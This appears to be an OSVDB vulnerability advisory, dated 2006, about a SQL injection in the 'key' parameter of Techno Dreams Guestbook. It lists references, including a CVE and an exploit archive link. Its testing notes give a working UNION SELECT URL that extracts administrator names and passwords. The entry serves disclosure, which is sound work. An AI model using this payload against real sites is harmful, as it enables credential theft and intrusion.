Techno Dreams Guestbook guestbookview.asp key Variable SQL Injection

2006-10-30T09:18:56
ID OSVDB:30147
Type osvdb
Reporter OSVDB
Modified 2006-10-30T09:18:56

Description

Manual Testing Notes

http://[target]/guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin

References:

Vendor URL: http://www.t-dreams.com/downloads.asp Secunia Advisory ID:22600 ISS X-Force ID: 29869 Generic Exploit URL: http://www.milw0rm.com/exploits/2684 FrSIRT Advisory: ADV-2006-4277 CVE-2006-5640 Bugtraq ID: 20802